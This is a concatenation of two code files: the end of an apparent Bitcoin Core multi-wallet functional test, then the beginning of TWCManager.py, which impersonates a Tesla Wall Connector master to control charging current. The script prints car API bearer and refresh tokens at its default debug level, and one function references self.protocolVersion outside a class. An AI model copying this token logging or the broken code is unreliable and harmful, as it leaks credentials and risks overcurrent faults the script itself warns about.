assert_equal(info['immature_balance'], 50 if wallet is wallets[0] else 0)
assert_equal(info['walletname'], wallet_name)
# accessing invalid wallet fails
assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", wallet_bad.getwalletinfo)
# accessing wallet RPC without using wallet endpoint fails
assert_raises_rpc_error(-19, "Wallet file not specified", node.getwalletinfo)
w1, w2, w3, w4, *_ = wallets
self.generatetoaddress(node, nblocks=COINBASE_MATURITY + 1, address=w1.getnewaddress(), sync_fun=self.no_op)
assert_equal(w1.getbalance(), 100)
assert_equal(w2.getbalance(), 0)
assert_equal(w3.getbalance(), 0)
assert_equal(w4.getbalance(), 0)
w1.sendtoaddress(w2.getnewaddress(), 1)
w1.sendtoaddress(w3.getnewaddress(), 2)
w1.sendtoaddress(w4.getnewaddress(), 3)
self.generatetoaddress(node, nblocks=1, address=w1.getnewaddress(), sync_fun=self.no_op)
assert_equal(w2.getbalance(), 1)
assert_equal(w3.getbalance(), 2)
assert_equal(w4.getbalance(), 3)
batch = w1.batch([w1.getblockchaininfo.get_request(), w1.getwalletinfo.get_request()])
assert_equal(batch[0]["result"]["chain"], self.chain)
assert_equal(batch[1]["result"]["walletname"], "w1")
self.log.info('Check for per-wallet settxfee call')
assert_equal(w1.getwalletinfo()['paytxfee'], 0)
assert_equal(w2.getwalletinfo()['paytxfee'], 0)
w2.settxfee(0.001)
assert_equal(w1.getwalletinfo()['paytxfee'], 0)
assert_equal(w2.getwalletinfo()['paytxfee'], Decimal('0.00100000'))
self.log.info("Test dynamic wallet loading")
self.restart_node(0, ['-nowallet'])
assert_equal(node.listwallets(), [])
assert_raises_rpc_error(-18, "No wallet is loaded. Load a wallet using loadwallet or create a new one with createwallet. (Note: A default wallet is no longer automatically created)", node.getwalletinfo)
self.log.info("Load first wallet")
loadwallet_name = node.loadwallet(wallet_names[0])
assert_equal(loadwallet_name['name'], wallet_names[0])
assert_equal(node.listwallets(), wallet_names[0:1])
node.getwalletinfo()
w1 = node.get_wallet_rpc(wallet_names[0])
w1.getwalletinfo()
self.log.info("Load second wallet")
loadwallet_name = node.loadwallet(wallet_names[1])
assert_equal(loadwallet_name['name'], wallet_names[1])
assert_equal(node.listwallets(), wallet_names[0:2])
assert_raises_rpc_error(-19, "Wallet file not specified", node.getwalletinfo)
w2 = node.get_wallet_rpc(wallet_names[1])
w2.getwalletinfo()
self.log.info("Concurrent wallet loading")
threads = []
for _ in range(3):
n = node.cli if self.options.usecli else get_rpc_proxy(node.url, 1, timeout=600, coveragedir=node.coverage_dir)
t = Thread(target=test_load_unload, args=(n, wallet_names[2]))
t.start()
threads.append(t)
for t in threads:
t.join()
global got_loading_error
assert_equal(got_loading_error, True)
self.log.info("Load remaining wallets")
for wallet_name in wallet_names[2:]:
loadwallet_name = self.nodes[0].loadwallet(wallet_name)
assert_equal(loadwallet_name['name'], wallet_name)
assert_equal(set(self.nodes[0].listwallets()), set(wallet_names))
# Fail to load if wallet doesn't exist
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "wallets")
assert_raises_rpc_error(-18, "Wallet file verification failed. Failed to load database path '{}'. Path does not exist.".format(path), self.nodes[0].loadwallet, 'wallets')
# Fail to load duplicate wallets
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "w1", "wallet.dat")
if self.options.descriptors:
assert_raises_rpc_error(-4, f"Wallet file verification failed. SQLiteDatabase: Unable to obtain an exclusive lock on the database, is it being used by another instance of {self.config['environment']['PACKAGE_NAME']}?", self.nodes[0].loadwallet, wallet_names[0])
else:
assert_raises_rpc_error(-35, "Wallet file verification failed. Refusing to load database. Data file '{}' is already loaded.".format(path), self.nodes[0].loadwallet, wallet_names[0])
# This tests the default wallet that BDB makes, so SQLite wallet doesn't need to test this
# Fail to load duplicate wallets by different ways (directory and filepath)
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "wallet.dat")
assert_raises_rpc_error(-35, "Wallet file verification failed. Refusing to load database. Data file '{}' is already loaded.".format(path), self.nodes[0].loadwallet, 'wallet.dat')
# Only BDB doesn't open duplicate wallet files. SQLite does not have this limitation. While this may be desired in the future, it is not necessary
# Fail to load if one wallet is a copy of another
assert_raises_rpc_error(-4, "BerkeleyDatabase: Can't open database w8_copy (duplicates fileid", self.nodes[0].loadwallet, 'w8_copy')
# Fail to load if one wallet is a copy of another, test this twice to make sure that we don't re-introduce #14304
assert_raises_rpc_error(-4, "BerkeleyDatabase: Can't open database w8_copy (duplicates fileid", self.nodes[0].loadwallet, 'w8_copy')
# Fail to load if wallet file is a symlink
assert_raises_rpc_error(-4, "Wallet file verification failed. Invalid -wallet path 'w8_symlink'", self.nodes[0].loadwallet, 'w8_symlink')
# Fail to load if a directory is specified that doesn't contain a wallet
os.mkdir(wallet_dir('empty_wallet_dir'))
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "empty_wallet_dir")
assert_raises_rpc_error(-18, "Wallet file verification failed. Failed to load database path '{}'. Data is not in recognized format.".format(path), self.nodes[0].loadwallet, 'empty_wallet_dir')
self.log.info("Test dynamic wallet creation.")
# Fail to create a wallet if it already exists.
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "w2")
assert_raises_rpc_error(-4, "Failed to create database path '{}'. Database already exists.".format(path), self.nodes[0].createwallet, 'w2')
# Successfully create a wallet with a new name
loadwallet_name = self.nodes[0].createwallet('w9')
in_wallet_dir.append('w9')
assert_equal(loadwallet_name['name'], 'w9')
w9 = node.get_wallet_rpc('w9')
assert_equal(w9.getwalletinfo()['walletname'], 'w9')
assert 'w9' in self.nodes[0].listwallets()
# Successfully create a wallet using a full path
new_wallet_dir = os.path.join(self.options.tmpdir, 'new_walletdir')
new_wallet_name = os.path.join(new_wallet_dir, 'w10')
loadwallet_name = self.nodes[0].createwallet(new_wallet_name)
assert_equal(loadwallet_name['name'], new_wallet_name)
w10 = node.get_wallet_rpc(new_wallet_name)
assert_equal(w10.getwalletinfo()['walletname'], new_wallet_name)
assert new_wallet_name in self.nodes[0].listwallets()
self.log.info("Test dynamic wallet unloading")
# Test `unloadwallet` errors
assert_raises_rpc_error(-1, "JSON value is not a string as expected", self.nodes[0].unloadwallet)
assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", self.nodes[0].unloadwallet, "dummy")
assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", node.get_wallet_rpc("dummy").unloadwallet)
assert_raises_rpc_error(-8, "RPC endpoint wallet and wallet_name parameter specify different wallets", w1.unloadwallet, "w2"),
# Successfully unload the specified wallet name
self.nodes[0].unloadwallet("w1")
assert 'w1' not in self.nodes[0].listwallets()
# Unload w1 again, this time providing the wallet name twice
self.nodes[0].loadwallet("w1")
assert 'w1' in self.nodes[0].listwallets()
w1.unloadwallet("w1")
assert 'w1' not in self.nodes[0].listwallets()
# Successfully unload the wallet referenced by the request endpoint
# Also ensure unload works during walletpassphrase timeout
w2.encryptwallet('test')
w2.walletpassphrase('test', 1)
w2.unloadwallet()
time.sleep(1.1)
assert 'w2' not in self.nodes[0].listwallets()
# Successfully unload all wallets
for wallet_name in self.nodes[0].listwallets():
self.nodes[0].unloadwallet(wallet_name)
assert_equal(self.nodes[0].listwallets(), [])
assert_raises_rpc_error(-18, "No wallet is loaded. Load a wallet using loadwallet or create a new one with createwallet. (Note: A default wallet is no longer automatically created)", self.nodes[0].getwalletinfo)
# Successfully load a previously unloaded wallet
self.nodes[0].loadwallet('w1')
assert_equal(self.nodes[0].listwallets(), ['w1'])
assert_equal(w1.getwalletinfo()['walletname'], 'w1')
assert_equal(sorted(map(lambda w: w['name'], self.nodes[0].listwalletdir()['wallets'])), sorted(in_wallet_dir))
# Test backing up and restoring wallets
self.log.info("Test wallet backup")
self.restart_node(0, ['-nowallet'])
for wallet_name in wallet_names:
self.nodes[0].loadwallet(wallet_name)
for wallet_name in wallet_names:
rpc = self.nodes[0].get_wallet_rpc(wallet_name)
addr = rpc.getnewaddress()
backup = os.path.join(self.options.tmpdir, 'backup.dat')
if os.path.exists(backup):
os.unlink(backup)
rpc.backupwallet(backup)
self.nodes[0].unloadwallet(wallet_name)
shutil.copyfile(empty_created_wallet if wallet_name == self.default_wallet_name else empty_wallet, wallet_file(wallet_name))
self.nodes[0].loadwallet(wallet_name)
assert_equal(rpc.getaddressinfo(addr)['ismine'], False)
self.nodes[0].unloadwallet(wallet_name)
shutil.copyfile(backup, wallet_file(wallet_name))
self.nodes[0].loadwallet(wallet_name)
assert_equal(rpc.getaddressinfo(addr)['ismine'], True)
# Test .walletlock file is closed
self.start_node(1)
wallet = os.path.join(self.options.tmpdir, 'my_wallet')
self.nodes[0].createwallet(wallet)
if self.options.descriptors:
assert_raises_rpc_error(-4, "Unable to obtain an exclusive lock", self.nodes[1].loadwallet, wallet)
else:
assert_raises_rpc_error(-4, "Error initializing wallet database environment", self.nodes[1].loadwallet, wallet)
self.nodes[0].unloadwallet(wallet)
self.nodes[1].loadwallet(wallet)
if __name__ == '__main__':
MultiWalletTest().main()
|
TWCManager.py
|
#! /usr/bin/python3
################################################################################
# Code and TWC protocol reverse engineering by Chris Dragon.
#
# Additional logs and hints provided by Teslamotorsclub.com users:
# TheNoOne, IanAmber, and twc.
# Thank you!
#
# For support and information, please read through this thread:
# https://teslamotorsclub.com/tmc/threads/new-wall-connector-load-sharing-protocol.72830
#
# Report bugs at https://github.com/cdragon/TWCManager/issues
#
# This software is released under the "Unlicense" model: http://unlicense.org
# This means source code and TWC protocol knowledge are released to the general
# public free for personal or commercial use. I hope the knowledge will be used
# to increase the use of green energy sources by controlling the time and power
# level of car charging.
#
# WARNING:
# Misuse of the protocol described in this software can direct a Tesla Wall
# Charger to supply more current to a car than the charger wiring was designed
# for. This will trip a circuit breaker or may start a fire in the unlikely
# event that the circuit breaker fails.
# This software was not written or designed with the benefit of information from
# Tesla and there is always a small possibility that some unforeseen aspect of
# its operation could damage a Tesla vehicle or a Tesla Wall Charger. All
# efforts have been made to avoid such damage and this software is in active use
# on the author's own vehicle and TWC.
#
# In short, USE THIS SOFTWARE AT YOUR OWN RISK.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
# For more information, please visit http://unlicense.org
################################################################################
# What's TWCManager good for?
#
# This script (TWCManager) pretends to be a Tesla Wall Charger (TWC) set to
# master mode. When wired to the IN or OUT pins of real TWC units set to slave
# mode (rotary switch position F), TWCManager can tell them to limit car
# charging to any whole amp value between 5A and the max rating of the charger.
# Charging can also be stopped so the car goes to sleep.
#
# This level of control is useful for having TWCManager track the real-time
# availability of green energy sources and direct the slave TWCs to use near the
# exact amount of energy available. This saves energy compared to sending the
# green energy off to a battery for later car charging or off to the grid where
# some of it is lost in transmission.
#
# TWCManager can also be set up to only allow charging during certain hours,
# stop charging if a grid overload or "save power day" is detected, reduce
# charging on one TWC when a "more important" one is plugged in, or whatever
# else you might want to do.
#
# One thing TWCManager does not have direct access to is the battery charge
# percentage of each plugged-in car. There are hints on forums that some TWCs
# do report battery state, but we have yet to see a TWC send such a message.
# It's possible the feature exists in TWCs with newer firmware.
# This is unfortunate, but if you own a Tesla vehicle being charged, people have
# figured out how to get its charge state by contacting Tesla's servers using
# the same password you use in the Tesla phone app. Be very careful not to
# expose that password because it allows unlocking and starting the car.
################################################################################
# Overview of protocol TWCs use to load share
#
# A TWC set to slave mode (rotary switch position F) sends a linkready message
# every 10 seconds.
# The message contains a unique 4-byte id that identifies that particular slave
# as the sender of the message.
#
# A TWC set to master mode sees a linkready message. In response, it sends a
# heartbeat message containing the slave's 4-byte id as the intended recipient
# of the message.
# The master's 4-byte id is included as the sender of the message.
#
# Slave sees a heartbeat message from master directed to its unique 4-byte id
# and responds with its own heartbeat message containing the master's 4-byte id
# as the intended recipient of the message.
# The slave's 4-byte id is included as the sender of the message.
#
# Master sends a heartbeat to a slave around once per second and expects a
# response heartbeat from the slave.
# Slaves do not send heartbeats without seeing one from a master first. If
# heartbeats stop coming from master, slave resumes sending linkready every 10
# seconds.
# If slaves stop replying to heartbeats from master, master stops sending
# heartbeats after about 26 seconds.
#
# Heartbeat messages contain a data block used to negotiate the amount of power
# available to each slave and to the master.
# The first byte is a status indicating things like is TWC plugged in, does it
# want power, is there an error, etc.
# Next two bytes indicate the amount of power requested or the amount allowed in
# 0.01 amp increments.
# Next two bytes indicate the amount of power being used to charge the car, also in
# 0.01 amp increments.
# Remaining bytes always contain a value of 0.
import serial
import time
import re
import subprocess
import queue
import random
import math
import struct
import sys
import traceback
import sysv_ipc
import json
from datetime import datetime
import threading
import requests as req
from pymodbus.constants import Endian
from pymodbus.payload import BinaryPayloadDecoder
from pymodbus.client.sync import ModbusTcpClient as ModbusClient
##########################
#
# Configuration parameters
#
# Most users will have only one ttyUSB adapter plugged in and the default value
# of '/dev/ttyUSB0' below will work. If not, run 'dmesg |grep ttyUSB' on the
# command line to find your rs485 adapter and put its ttyUSB# value in the
# parameter below.
# If you're using a non-USB adapter like an RS485 shield, the value may need to
# be something like '/dev/serial0'.
rs485Adapter = '/dev/ttyUSB0'
# Set wiringMaxAmpsAllTWCs to the maximum number of amps your charger wiring
# can handle. I default this to a low 6A which should be safe with the minimum
# standard of wiring in the areas of the world that I'm aware of.
# Most U.S. chargers will be wired to handle at least 40A and sometimes 80A,
# whereas EU chargers will handle at most 32A (using 3 AC lines instead of 2 so
# the total power they deliver is similar).
# Setting wiringMaxAmpsAllTWCs too high will trip the circuit breaker on your
# charger at best or START A FIRE if the circuit breaker malfunctions.
# Keep in mind that circuit breakers are designed to handle only 80% of their
# max power rating continuously, so if your charger has a 50A circuit breaker,
# put 50 * 0.8 = 40 here.
# 40 amp breaker * 0.8 = 32 here.
# 30 amp breaker * 0.8 = 24 here.
# 100 amp breaker * 0.8 = 80 here.
# IF YOU'RE NOT SURE WHAT TO PUT HERE, ASK THE ELECTRICIAN WHO INSTALLED YOUR
# CHARGER.
wiringMaxAmpsAllTWCs = 32
# If all your chargers share a single circuit breaker, set wiringMaxAmpsPerTWC
# to the same value as wiringMaxAmpsAllTWCs.
# Rarely, each TWC will be wired to its own circuit breaker. If you're
# absolutely sure your chargers each have a separate breaker, put the value of
# that breaker * 0.8 here, and put the sum of all breakers * 0.8 as the value of
# wiringMaxAmpsAllTWCs.
# For example, if you have two TWCs each with a 50A breaker, set
# wiringMaxAmpsPerTWC = 50 * 0.8 = 40 and wiringMaxAmpsAllTWCs = 40 + 40 = 80.
wiringMaxAmpsPerTWC = 32
# https://teslamotorsclub.com/tmc/threads/model-s-gen2-charger-efficiency-testing.78740/#post-1844789
# says you're using 10.85% more power (91.75/82.77=1.1085) charging at 5A vs 40A,
# 2.48% more power at 10A vs 40A, and 1.9% more power at 20A vs 40A. This is
# using a car with 2nd generation onboard AC/DC converter (VINs ending in 20000
# and higher).
# https://teslamotorsclub.com/tmc/threads/higher-amp-charging-is-more-efficient.24972/
# says that cars using a 1st generation charger may use up to 30% more power
# at 6A vs 40A! However, the data refers to 120V 12A charging vs 240V 40A
# charging. 120V 12A is technically the same power as 240V 6A, but the car
# batteries need 400V DC to charge and a lot more power is wasted converting
# 120V AC to 400V DC than 240V AC to 400V DC.
#
# The main point is 6A charging wastes a lot of power, so we default to charging
# at a minimum of 12A by setting minAmpsPerTWC to 12. I picked 12A instead of 10A
# because there is a theory that multiples of 3A are most efficient, though I
# couldn't find any data showing that had been tested.
#
# Most EU chargers are connected to 230V, single-phase power which means 12A is
# about the same power as in US chargers. If you have three-phase power, you can
# lower minAmpsPerTWC to 6 and still be charging with more power than 12A on
# single-phase. For example, 12A * 230V * 1 = 2760W for single-phase power, while
# 6A * 230V * 3 = 4140W for three-phase power. Consult an electrician if this
# doesn't make sense.
#
# https://forums.tesla.com/forum/forums/charging-lowest-amperage-purposely
# says another reason to charge at higher power is to preserve battery life.
# The best charge rate is the capacity of the battery pack / 2. Home chargers
# can't reach that rate, so charging as fast as your wiring supports is best
# from that standpoint. It's not clear how much damage charging at slower
# rates really does.
minAmpsPerTWC = 5
# When you have more than one vehicle associated with the Tesla car API and
# onlyChargeMultiCarsAtHome = True, cars will only be controlled by the API when
# parked at home. For example, when one vehicle is plugged in at home and
# another is plugged in at a remote location and you've set TWCManager to stop
# charging at the current time, only the one plugged in at home will be stopped
# from charging using the car API.
# Unfortunately, bugs in the car GPS system may cause a car to not be reported
# as at home even if it is, in which case the car might not be charged when you
# expect it to be. If you encounter that problem with multiple vehicles, you can
# set onlyChargeMultiCarsAtHome = False, but you may encounter the problem of
# a car not at home being stopped from charging by the API.
onlyChargeMultiCarsAtHome = True
# After determining how much green energy is available for charging, we add
# greenEnergyAmpsOffset to the value. This is most often given a negative value
# equal to the average amount of power consumed by everything other than car
# charging. For example, if your house uses an average of 2.8A to power
# computers, lights, etc while you expect the car to be charging, set
# greenEnergyAmpsOffset = -2.8.
#
# If you have solar panels, look at your utility meter while your car charges.
# If it says you're using 0.67kW, that means you should set
# greenEnergyAmpsOffset = -0.67kW * 1000 / 240V = -2.79A assuming you're on the
# North American 240V grid. In other words, during car charging, you want your
# utility meter to show a value close to 0kW meaning no energy is being sent to
# or from the grid.
greenEnergyAmpsOffset = -1
# Choose how much debugging info to output.
# 0 is no output other than errors.
# 1 is just the most useful info.
# 2-8 add debugging info
# 9 includes raw RS-485 messages transmitted and received (2-3 per sec)
# 10 is all info.
# 11 is more than all info. ;)
debugLevel = 10
# Choose whether to display milliseconds after time on each line of debug info.
displayMilliseconds = False
# Normally we fake being a TWC Master using fakeMaster = 1.
# Two other settings are available, but are only useful for debugging and
# experimenting:
# Set fakeMaster = 0 to fake being a TWC Slave instead of Master.
# Set fakeMaster = 2 to display received RS-485 messages but not send any
# unless you use the debugging web interface
# (index.php?debugTWC=1) to send messages.
fakeMaster = 1
# TWC's rs485 port runs at 9600 baud which has been verified with an
# oscilloscope. Don't change this unless something changes in future hardware.
baud = 9600
# All TWCs ship with a random two-byte TWCID. We default to using 0x7777 as our
# fake TWC ID. There is a 1 in 64535 chance that this ID will match each real
# TWC on the network, in which case you should pick a different random id below.
# This isn't really too important because even if this ID matches another TWC on
# the network, that TWC will pick its own new random ID as soon as it sees ours
# conflicts.
fakeTWCID = bytearray(b'\x77\x77')
# TWCs send a seemingly-random byte after their 2-byte TWC id in a number of
# messages. I call this byte their "Sign" for lack of a better term. The byte
# never changes unless the TWC is reset or power cycled. We use hard-coded
# values for now because I don't know if there are any rules to what values can
# be chosen. I picked 77 because it's easy to recognize when looking at logs.
# These shouldn't need to be changed.
masterSign = bytearray(b'\x77')
slaveSign = bytearray(b'\x77')
#
# End configuration parameters
#
##############################
##############################
#
# Begin functions
#
def time_now():
global displayMilliseconds
return(datetime.now().strftime("%H:%M:%S" + (
".%f" if displayMilliseconds else "")))
def hex_str(s:str):
return " ".join("{:02X}".format(ord(c)) for c in s)
def hex_str(ba:bytearray):
return " ".join("{:02X}".format(c) for c in ba)
def run_process(cmd):
result = None
try:
result = subprocess.check_output(cmd, shell=True)
except subprocess.CalledProcessError:
# We reach this point if the process returns a non-zero exit code.
result = b''
return result
def load_settings():
global debugLevel, settingsFileName, nonScheduledAmpsMax, scheduledAmpsMax, \
scheduledAmpsStartHour, scheduledAmpsEndHour, \
scheduledAmpsDaysBitmap, hourResumeTrackGreenEnergy, kWhDelivered, \
carApiBearerToken, carApiRefreshToken, carApiTokenExpireTime, \
homeLat, homeLon
try:
fh = open(settingsFileName, 'r')
for line in fh:
m = re.search(r'^\s*nonScheduledAmpsMax\s*=\s*([-0-9.]+)', line, re.MULTILINE)
if(m):
nonScheduledAmpsMax = int(m.group(1))
if(debugLevel >= 10):
print("load_settings: nonScheduledAmpsMax set to " + str(nonScheduledAmpsMax))
continue
m = re.search(r'^\s*scheduledAmpsMax\s*=\s*([-0-9.]+)', line, re.MULTILINE)
if(m):
scheduledAmpsMax = int(m.group(1))
if(debugLevel >= 10):
print("load_settings: scheduledAmpsMax set to " + str(scheduledAmpsMax))
continue
m = re.search(r'^\s*scheduledAmpsStartHour\s*=\s*([-0-9.]+)', line, re.MULTILINE)
if(m):
scheduledAmpsStartHour = float(m.group(1))
if(debugLevel >= 10):
print("load_settings: scheduledAmpsStartHour set to " + str(scheduledAmpsStartHour))
continue
m = re.search(r'^\s*scheduledAmpsEndHour\s*=\s*([-0-9.]+)', line, re.MULTILINE)
if(m):
scheduledAmpsEndHour = float(m.group(1))
if(debugLevel >= 10):
print("load_settings: scheduledAmpsEndHour set to " + str(scheduledAmpsEndHour))
continue
m = re.search(r'^\s*scheduledAmpsDaysBitmap\s*=\s*([-0-9.]+)', line, re.MULTILINE)
if(m):
scheduledAmpsDaysBitmap = int(m.group(1))
if(debugLevel >= 10):
print("load_settings: scheduledAmpsDaysBitmap set to " + str(scheduledAmpsDaysBitmap))
continue
m = re.search(r'^\s*hourResumeTrackGreenEnergy\s*=\s*([-0-9.]+)', line, re.MULTILINE)
if(m):
hourResumeTrackGreenEnergy = float(m.group(1))
if(debugLevel >= 10):
print("load_settings: hourResumeTrackGreenEnergy set to " + str(hourResumeTrackGreenEnergy))
continue
m = re.search(r'^\s*kWhDelivered\s*=\s*([-0-9.]+)', line, re.MULTILINE)
if(m):
kWhDelivered = float(m.group(1))
if(debugLevel >= 10):
print("load_settings: kWhDelivered set to " + str(kWhDelivered))
continue
m = re.search(r'^\s*carApiBearerToken\s*=\s*(.+)', line, re.MULTILINE)
if(m):
carApiBearerToken = m.group(1)
if(debugLevel >= 10):
print("load_settings: carApiBearerToken set to " + str(carApiBearerToken))
continue
m = re.search(r'^\s*carApiRefreshToken\s*=\s*(.+)', line, re.MULTILINE)
if(m):
carApiRefreshToken = m.group(1)
if(debugLevel >= 10):
print("load_settings: carApiRefreshToken set to " + str(carApiRefreshToken))
continue
m = re.search(r'^\s*carApiTokenExpireTime\s*=\s*(.+)', line, re.MULTILINE)
if(m):
carApiTokenExpireTime = float(m.group(1))
if(debugLevel >= 10):
print("load_settings: carApiTokenExpireTime set to " + str(carApiTokenExpireTime))
continue
m = re.search(r'^\s*homeLat\s*=\s*(.+)', line, re.MULTILINE)
if(m):
homeLat = float(m.group(1))
if(debugLevel >= 10):
print("load_settings: homeLat set to " + str(homeLat))
continue
m = re.search(r'^\s*homeLon\s*=\s*(.+)', line, re.MULTILINE)
if(m):
homeLon = float(m.group(1))
if(debugLevel >= 10):
print("load_settings: homeLon set to " + str(homeLon))
continue
print(time_now() + ": load_settings: Unknown setting " + line)
fh.close()
except FileNotFoundError:
pass
def save_settings():
global debugLevel, settingsFileName, nonScheduledAmpsMax, scheduledAmpsMax, \
scheduledAmpsStartHour, scheduledAmpsEndHour, \
scheduledAmpsDaysBitmap, hourResumeTrackGreenEnergy, kWhDelivered, \
carApiBearerToken, carApiRefreshToken, carApiTokenExpireTime, \
homeLat, homeLon
fh = open(settingsFileName, 'w')
fh.write('nonScheduledAmpsMax=' + str(nonScheduledAmpsMax) +
'\nscheduledAmpsMax=' + str(scheduledAmpsMax) +
'\nscheduledAmpsStartHour=' + str(scheduledAmpsStartHour) +
'\nscheduledAmpsEndHour=' + str(scheduledAmpsEndHour) +
'\nscheduledAmpsDaysBitmap=' + str(scheduledAmpsDaysBitmap) +
'\nhourResumeTrackGreenEnergy=' + str(hourResumeTrackGreenEnergy) +
'\nkWhDelivered=' + str(kWhDelivered) +
'\ncarApiBearerToken=' + str(carApiBearerToken) +
'\ncarApiRefreshToken=' + str(carApiRefreshToken) +
'\ncarApiTokenExpireTime=' + str(int(carApiTokenExpireTime)) +
'\nhomeLat=' + str(homeLat) +
'\nhomeLon=' + str(homeLon)
)
fh.close()
def trim_pad(s:bytearray, makeLen):
# Trim or pad s with zeros so that it's makeLen length.
while(len(s) < makeLen):
s += b'\x00'
if(len(s) > makeLen):
s = s[0:makeLen]
return s
def send_msg(msg):
# Send msg on the RS485 network. We'll escape bytes with a special meaning,
# add a CRC byte to the message end, and add a C0 byte to the start and end
# to mark where it begins and ends.
global ser, timeLastTx, fakeMaster, slaveTWCRoundRobin
msg = bytearray(msg)
checksum = 0
for i in range(1, len(msg)):
checksum += msg[i]
msg.append(checksum & 0xFF)
# Escaping special chars:
# The protocol uses C0 to mark the start and end of the message. If a C0
# must appear within the message, it is 'escaped' by replacing it with
# DB and DC bytes.
# A DB byte in the message is escaped by replacing it with DB DD.
#
# User FuzzyLogic found that this method of escaping and marking the start
# and end of messages is based on the SLIP protocol discussed here:
# https://en.wikipedia.org/wiki/Serial_Line_Internet_Protocol
i = 0
while(i < len(msg)):
if(msg[i] == 0xc0):
msg[i:i+1] = b'\xdb\xdc'
i = i + 1
elif(msg[i] == 0xdb):
msg[i:i+1] = b'\xdb\xdd'
i = i + 1
i = i + 1
msg = bytearray(b'\xc0' + msg + b'\xc0')
if(debugLevel >= 9):
print("Tx@" + time_now() + ": " + hex_str(msg))
ser.write(msg)
timeLastTx = time.time()
def unescape_msg(msg:bytearray, msgLen):
# Given a message received on the RS485 network, remove leading and trailing
# C0 byte, unescape special byte values, and verify its data matches the CRC
# byte.
msg = msg[0:msgLen]
# See notes in send_msg() for the way certain bytes in messages are escaped.
# We basically want to change db dc into c0 and db dd into db.
# Only scan to one less than the length of the string to avoid running off
# the end looking at i+1.
i = 0
while i < len(msg):
if(msg[i] == 0xdb):
if(msg[i+1] == 0xdc):
# Replace characters at msg[i] and msg[i+1] with 0xc0,
# shortening the string by one character. In Python, msg[x:y]
# refers to a substring starting at x and ending immediately
# before y. y - x is the length of the substring.
msg[i:i+2] = [0xc0]
elif(msg[i+1] == 0xdd):
msg[i:i+2] = [0xdb]
else:
print(time_now(), "ERROR: Special character 0xDB in message is " \
"followed by invalid character 0x%02X. " \
"Message may be corrupted." %
(msg[i+1]))
# Replace the character with something even though it's probably
# not the right thing.
msg[i:i+2] = [0xdb]
i = i+1
# Remove leading and trailing C0 byte.
msg = msg[1:len(msg)-1]
return msg
def send_master_linkready1():
if(debugLevel >= 1):
print(time_now() + ": Send master linkready1")
# When master is powered on or reset, it sends 5 to 7 copies of this
# linkready1 message followed by 5 copies of linkready2 (I've never seen
# more or less than 5 of linkready2).
#
# This linkready1 message advertises master's TWCID to other slaves on the
# network.
# If a slave happens to have the same id as master, it will pick a new
# random TWCID. Other than that, slaves don't seem to respond to linkready1.
# linkready1 and linkready2 are identical except FC E1 is replaced by FB E2
# in bytes 2-3. Both messages will cause a slave to pick a new id if the
# slave's id conflicts with master.
# If a slave stops sending heartbeats for awhile, master may send a series
# of linkready1 and linkready2 messages in seemingly random order, which
# means they don't indicate any sort of startup state.
# linkready1 is not sent again after boot/reset unless a slave sends its
# linkready message.
# At that point, linkready1 message may start sending every 1-5 seconds, or
# it may not be sent at all.
# Behaviors I've seen:
# Not sent at all as long as slave keeps responding to heartbeat messages
# right from the start.
# If slave stops responding, then re-appears, linkready1 gets sent
# frequently.
# One other possible purpose of linkready1 and/or linkready2 is to trigger
# an error condition if two TWCs on the network transmit those messages.
# That means two TWCs have rotary switches setting them to master mode and
# they will both flash their red LED 4 times with top green light on if that
# happens.
# Also note that linkready1 starts with FC E1 which is similar to the FC D1
# message that masters send out every 4 hours when idle. Oddly, the FC D1
# message contains all zeros instead of the master's id, so it seems
# pointless.
# I also don't understand the purpose of having both linkready1 and
# linkready2 since only two or more linkready2 will provoke a response from
# a slave regardless of whether linkready1 was sent previously. Firmware
# trace shows that slaves do something somewhat complex when they receive
# linkready1 but I haven't been curious enough to try to understand what
# they're doing. Tests show neither linkready1 or 2 are necessary. Slaves
# send slave linkready every 10 seconds whether or not they got master
# linkready1/2 and if a master sees slave linkready, it will start sending
# the slave master heartbeat once per second and the two are then connected.
send_msg(bytearray(b'\xFC\xE1') + fakeTWCID + masterSign + bytearray(b'\x00\x00\x00\x00\x00\x00\x00\x00'))
def send_master_linkready2():
if(debugLevel >= 1):
print(time_now() + ": Send master linkready2")
# This linkready2 message is also sent 5 times when master is booted/reset
# and then not sent again if no other TWCs are heard from on the network.
# If the master has ever seen a slave on the network, linkready2 is sent at
# long intervals.
# Slaves always ignore the first linkready2, but respond to the second
# linkready2 around 0.2s later by sending five slave linkready messages.
#
# It may be that this linkready2 message that sends FB E2 and the master
# heartbeat that sends fb e0 message are really the same, (same FB byte
# which I think is message type) except the E0 version includes the TWC ID
# of the slave the message is intended for whereas the E2 version has no
# recipient TWC ID.
#
# Once a master starts sending heartbeat messages to a slave, it
# no longer sends the global linkready2 message (or if it does,
# they're quite rare so I haven't seen them).
send_msg(bytearray(b'\xFB\xE2') + fakeTWCID + masterSign + bytearray(b'\x00\x00\x00\x00\x00\x00\x00\x00'))
def send_slave_linkready():
# In the message below, \x1F\x40 (hex 0x1f40 or 8000 in base 10) refers to
# this being a max 80.00Amp charger model.
# EU chargers are 32A and send 0x0c80 (3200 in base 10).
#
# I accidentally changed \x1f\x40 to \x2e\x69 at one point, which makes the
# master TWC immediately start blinking its red LED 6 times with top green
# LED on. Manual says this means "The networked Wall Connectors have
# different maximum current capabilities".
msg = bytearray(b'\xFD\xE2') + fakeTWCID + slaveSign + bytearray(b'\x1F\x40\x00\x00\x00\x00\x00\x00')
if(self.protocolVersion == 2):
msg += bytearray(b'\x00\x00')
send_msg(msg)
def master_id_conflict():
